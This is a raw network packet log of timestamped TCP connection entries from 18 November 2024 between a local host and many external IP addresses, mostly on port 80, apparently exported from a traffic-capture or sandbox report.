                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:33.041922092 CET5010380192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:33.041944027 CET5010380192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:33.046890020 CET805010318.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:33.046901941 CET805010318.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:33.446110010 CET80501023.254.94.185192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:33.446260929 CET5010280192.168.2.103.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:33.451884985 CET80501023.254.94.185192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:33.451961994 CET5010280192.168.2.103.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:33.458858967 CET5010480192.168.2.1085.214.228.140
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:33.464158058 CET805010485.214.228.140192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:33.464241028 CET5010480192.168.2.1085.214.228.140
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:33.464350939 CET5010480192.168.2.1085.214.228.140
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:33.464365005 CET5010480192.168.2.1085.214.228.140
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:33.469422102 CET805010485.214.228.140192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:33.469599009 CET805010485.214.228.140192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:33.731667995 CET805010318.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:33.731852055 CET5010380192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:33.737755060 CET805010318.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:33.737814903 CET5010380192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:33.968333006 CET5010580192.168.2.103.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:33.973695040 CET80501053.254.94.185192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:33.973814964 CET5010580192.168.2.103.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:33.973964930 CET5010580192.168.2.103.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:33.973992109 CET5010580192.168.2.103.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:33.979415894 CET80501053.254.94.185192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:33.979430914 CET80501053.254.94.185192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:34.334382057 CET805010485.214.228.140192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:34.335889101 CET5010480192.168.2.1085.214.228.140
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:34.335947037 CET5010480192.168.2.1085.214.228.140
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:34.343610048 CET805010485.214.228.140192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:34.343645096 CET805010485.214.228.140192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:34.599811077 CET805010485.214.228.140192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:34.613575935 CET5010680192.168.2.1047.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:34.621409893 CET805010647.129.31.212192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:34.621630907 CET5010680192.168.2.1047.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:34.621809006 CET5010680192.168.2.1047.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:34.621815920 CET5010680192.168.2.1047.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:34.629647970 CET805010647.129.31.212192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:34.629658937 CET805010647.129.31.212192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:34.650248051 CET5010480192.168.2.1085.214.228.140
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:34.936739922 CET80501053.254.94.185192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:34.936932087 CET5010580192.168.2.103.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:34.943185091 CET80501053.254.94.185192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:34.944711924 CET5010580192.168.2.103.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:35.124490023 CET5010780192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:35.130290985 CET805010754.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:35.130400896 CET5010780192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:35.130541086 CET5010780192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:35.130562067 CET5010780192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:35.137176991 CET805010754.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:35.137737989 CET805010754.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:35.972781897 CET805010754.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:35.973004103 CET5010780192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:35.978477001 CET805010754.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:35.978578091 CET5010780192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:36.088676929 CET805010647.129.31.212192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:36.088934898 CET5010680192.168.2.1047.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:36.097081900 CET805010647.129.31.212192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:36.097148895 CET5010680192.168.2.1047.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:36.106182098 CET5010880192.168.2.1034.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:36.115006924 CET805010834.211.97.45192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:36.115144968 CET5010880192.168.2.1034.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:36.115287066 CET5010880192.168.2.1034.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:36.115287066 CET5010880192.168.2.1034.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:36.123925924 CET805010834.211.97.45192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:36.124015093 CET805010834.211.97.45192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:36.166678905 CET5010980192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:36.172516108 CET805010954.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:36.172677994 CET5010980192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:36.172991991 CET5010980192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:36.173007965 CET5010980192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:36.178284883 CET805010954.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:36.178320885 CET805010954.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:36.958697081 CET805010834.211.97.45192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:36.958924055 CET5010880192.168.2.1034.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:36.964382887 CET805010834.211.97.45192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:36.964504957 CET5010880192.168.2.1034.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:36.973954916 CET5011080192.168.2.1047.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:36.978939056 CET805011047.129.31.212192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:36.979166985 CET5011080192.168.2.1047.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:36.979166985 CET5011080192.168.2.1047.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:36.979301929 CET5011080192.168.2.1047.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:36.984139919 CET805011047.129.31.212192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:36.984158039 CET805011047.129.31.212192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:37.018814087 CET805010954.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:37.019071102 CET5010980192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:37.024552107 CET805010954.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:37.024621964 CET5010980192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:37.310873985 CET5011180192.168.2.1018.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:37.316055059 CET805011118.246.231.120192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:37.316164970 CET5011180192.168.2.1018.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:37.316297054 CET5011180192.168.2.1018.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:37.316323042 CET5011180192.168.2.1018.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:37.321428061 CET805011118.246.231.120192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:37.321459055 CET805011118.246.231.120192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:38.162082911 CET805011118.246.231.120192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:38.162328005 CET5011180192.168.2.1018.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:38.167922020 CET805011118.246.231.120192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:38.167993069 CET5011180192.168.2.1018.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:38.410995960 CET5011280192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:38.416117907 CET805011218.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:38.416230917 CET5011280192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:38.416376114 CET5011280192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:38.416405916 CET5011280192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:38.421308994 CET805011218.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:38.421323061 CET805011218.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:38.476994991 CET805011047.129.31.212192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:38.477166891 CET5011080192.168.2.1047.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:38.482496023 CET805011047.129.31.212192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:38.482584000 CET5011080192.168.2.1047.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:38.490102053 CET5011380192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:38.495028019 CET805011318.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:38.495157003 CET5011380192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:38.495194912 CET5011380192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:38.495480061 CET5011380192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:38.500451088 CET805011318.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:38.500643969 CET805011318.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:38.527806997 CET49984587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:38.533003092 CET5874998451.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:38.773081064 CET5874998451.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:38.773653984 CET49984587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:39.091928005 CET805011218.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:39.092461109 CET5011280192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:39.097718954 CET805011218.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:39.100948095 CET5011280192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:39.169465065 CET805011318.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:39.169620037 CET5011380192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:39.175986052 CET805011318.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:39.176060915 CET5011380192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:39.191019058 CET5011480192.168.2.1013.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:39.195988894 CET805011413.251.16.150192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:39.196063042 CET5011480192.168.2.1013.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:39.196141958 CET5011480192.168.2.1013.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:39.196160078 CET5011480192.168.2.1013.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:39.201174021 CET805011413.251.16.150192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:39.201302052 CET805011413.251.16.150192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:39.363358974 CET5011580192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:39.369128942 CET805011544.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:39.369199991 CET5011580192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:39.369318008 CET5011580192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:39.369334936 CET5011580192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:39.374826908 CET805011544.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:39.374842882 CET805011544.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:40.034821033 CET805011544.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:40.038552046 CET5011580192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:40.044260979 CET805011544.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:40.044343948 CET5011580192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:40.371679068 CET5011680192.168.2.1072.52.178.23
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:40.376898050 CET805011672.52.178.23192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:40.377008915 CET5011680192.168.2.1072.52.178.23
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:40.377171993 CET5011680192.168.2.1072.52.178.23
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:40.377193928 CET5011680192.168.2.1072.52.178.23
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:40.382355928 CET805011672.52.178.23192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:40.382368088 CET805011672.52.178.23192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:40.632520914 CET805011413.251.16.150192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:40.632767916 CET5011480192.168.2.1013.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:40.638139009 CET805011413.251.16.150192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:40.638197899 CET5011480192.168.2.1013.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:40.650341988 CET5011780192.168.2.1034.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:40.655389071 CET805011734.246.200.160192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:40.655479908 CET5011780192.168.2.1034.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:40.655626059 CET5011780192.168.2.1034.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:40.655649900 CET5011780192.168.2.1034.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:40.660495043 CET805011734.246.200.160192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:40.660507917 CET805011734.246.200.160192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:41.108465910 CET805011672.52.178.23192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:41.108531952 CET5011680192.168.2.1072.52.178.23
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:41.108580112 CET5011680192.168.2.1072.52.178.23
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:41.113521099 CET805011672.52.178.23192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:41.142713070 CET5011880192.168.2.1072.52.178.23
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:41.147633076 CET805011872.52.178.23192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:41.147764921 CET5011880192.168.2.1072.52.178.23
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:41.147953987 CET5011880192.168.2.1072.52.178.23
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:41.147967100 CET5011880192.168.2.1072.52.178.23
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:41.152901888 CET805011872.52.178.23192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:41.153815985 CET805011872.52.178.23192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:41.624903917 CET805011734.246.200.160192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:41.625061035 CET5011780192.168.2.1034.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:41.630975008 CET805011734.246.200.160192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:41.631059885 CET5011780192.168.2.1034.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:41.638109922 CET5011980192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:41.643290997 CET805011918.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:41.643352032 CET5011980192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:41.643486977 CET5011980192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:41.643496990 CET5011980192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:41.648646116 CET805011918.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:41.648657084 CET805011918.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:41.822117090 CET805011872.52.178.23192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:41.822187901 CET5011880192.168.2.1072.52.178.23
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:41.822242975 CET5011880192.168.2.1072.52.178.23
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:41.827121019 CET805011872.52.178.23192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:42.073465109 CET5012080192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:42.078500986 CET805012044.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:42.078593016 CET5012080192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:42.079713106 CET5012080192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:42.079735041 CET5012080192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:42.084582090 CET805012044.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:42.084594011 CET805012044.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:42.211695910 CET8050068165.160.15.20192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:42.211764097 CET5006880192.168.2.10165.160.15.20
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:42.211863041 CET5006880192.168.2.10165.160.15.20
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:42.216883898 CET8050068165.160.15.20192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:42.751473904 CET805012044.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:42.753397942 CET5012080192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:42.758697987 CET805012044.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:42.758821011 CET5012080192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:43.106554031 CET805011918.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:43.110480070 CET5011980192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:43.116425991 CET805011918.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:43.116513968 CET5011980192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:43.122962952 CET5012180192.168.2.1013.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:43.128032923 CET805012113.251.16.150192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:43.128112078 CET5012180192.168.2.1013.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:43.128339052 CET5012180192.168.2.1013.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:43.128350973 CET5012180192.168.2.1013.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:43.133639097 CET805012113.251.16.150192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:43.133676052 CET805012113.251.16.150192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:43.191997051 CET5012280192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:43.197365046 CET805012218.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:43.197458029 CET5012280192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:43.197602034 CET5012280192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:43.197626114 CET5012280192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:43.202701092 CET805012218.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:43.202737093 CET805012218.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:44.570369959 CET805012113.251.16.150192.168.2.10
